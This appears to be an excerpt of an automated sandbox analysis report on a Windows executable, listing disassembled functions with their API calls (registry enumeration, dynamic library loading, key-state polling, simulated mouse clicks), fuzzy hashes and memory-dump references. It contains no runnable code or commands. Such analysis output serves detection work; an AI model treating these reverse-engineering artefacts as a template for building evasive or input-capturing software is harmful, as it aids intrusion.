Instruction ID: c535a9b74c3be08fb66675131960c2e3f57dfdec9721024cad96d7a05cd33cf3
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: 9051BB30B00B15EBCB149E65F84066FB7B2AF40325F94472FF825963D4D7789D918B49

Function 00480037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22

Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004800FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0048013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00480183
RegCloseKey.ADVAPI32(?,?), ref: 004801AF
RegCloseKey.ADVAPI32(00000000), ref: 004801BC

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: 359206fcd8379e0793ee5fe764a6f8573afec8092144811008bc698b7cf463b9
Instruction ID: 88ea7daa6ea56d794f8f44f15d5cebce8ee28ea1eb3ac59e56a3faba9080710b
Opcode Fuzzy Hash: 359206fcd8379e0793ee5fe764a6f8573afec8092144811008bc698b7cf463b9
Instruction Fuzzy Hash: 00517E71214204AFC704EF54C885E6FB7E8FF84318F40492EF595972A2DB39E909CB56

Function 0047D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047D927
GetProcAddress.KERNEL32(00000000,?), ref: 0047D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 0047D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 0047DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0047DA21

Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 06879a4796fb006db6701dcbeb08c84373d42f215ecc0ca78cf9e4c751ad0c13
Instruction ID: 2e87ffb2dc156b6f817890f7ff3d29c7ed6bd27adfaf25e4966d104b6097512d
Opcode Fuzzy Hash: 06879a4796fb006db6701dcbeb08c84373d42f215ecc0ca78cf9e4c751ad0c13
Instruction Fuzzy Hash: C6512A75A00205DFCB00EFA9C4849AEB7B4FF09324B14C06AE959AB352D739AD45CF59

Function 0046E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0046E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0046E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0046E687

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0046E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0046E6B4

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: ce3a5ebd9efaa8be180502ddb4eb8e69980282fa1457036a913740e8c9ea0622
Instruction ID: 91bc9b0f2d422c2787d2346e32f4aa496c052f5f6ad9ddd010e4038a96899c27
Opcode Fuzzy Hash: ce3a5ebd9efaa8be180502ddb4eb8e69980282fa1457036a913740e8c9ea0622
Instruction Fuzzy Hash: 21514D75A00105DFCB01EF65C981AAEBBF5EF09314F1480AAE809AB3A2DB35ED11CF55

Function 0048A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
Instruction ID: 1d009f8157befd3e54c409f5ed609bf9f47d87f5e0fd5ad8ffda0b3aa488663e
Opcode Fuzzy Hash: 22afa8660c4250821daf86cd4b3c3329a23997c60e7bd91151dab5187926c109
Instruction Fuzzy Hash: A1419435904114ABE710FF24CC4CFAEBBA4EB09310F144A67E815A73E1C7B8AD65D75A

Function 00402344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00402357
ScreenToClient.USER32(004C57B0,?), ref: 00402374
GetAsyncKeyState.USER32(00000001), ref: 00402399
GetAsyncKeyState.USER32(00000002), ref: 004023A7

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
Instruction ID: 839f7de4dd1eaa7d0d5dffd0863558e2d4fc2f6d206a63eef28a724dc464cb27
Opcode Fuzzy Hash: 68046f809d22b14954676cdf12726acdb6c494720a6fd25c838d2cb9e82985d9
Instruction Fuzzy Hash: EB416135504115FBCF199FA9C848AEEBB74FB09364F20432BE825A22D0C7789D54DB95

Function 004563AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004563E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00456433
TranslateMessage.USER32(?), ref: 0045645C
DispatchMessageW.USER32(?), ref: 00456466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00456475

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D

Function 00458A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00458A30
PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94

Function 0045B1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0045B204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
_wcsstr.LIBCMT ref: 0045B289

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: ccedf1314e292b33b4005b9315d2ae5abe8540abcd3cb28b079f820d5780fe89
Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
Opcode Fuzzy Hash: ccedf1314e292b33b4005b9315d2ae5abe8540abcd3cb28b079f820d5780fe89
Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8

Function 0048B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

GetWindowLongW.USER32(?,000000F0), ref: 0048B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
GetSystemMetrics.USER32(00000004), ref: 0048B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98

Function 00459307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
__itow.LIBCMT ref: 0045936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
__itow.LIBCMT ref: 004593A3

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A

Function 004012F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
SelectObject.GDI32(?,00000000), ref: 0040135C
BeginPath.GDI32(?), ref: 00401373
SelectObject.GDI32(?,00000000), ref: 0040139C

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9

Function 00464A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00464ABA
__beginthreadex.LIBCMT ref: 00464AD8
MessageBoxW.USER32(?,?,?,?), ref: 00464AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9

Function 00458202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64

Function 0045710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4

Function 00465244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
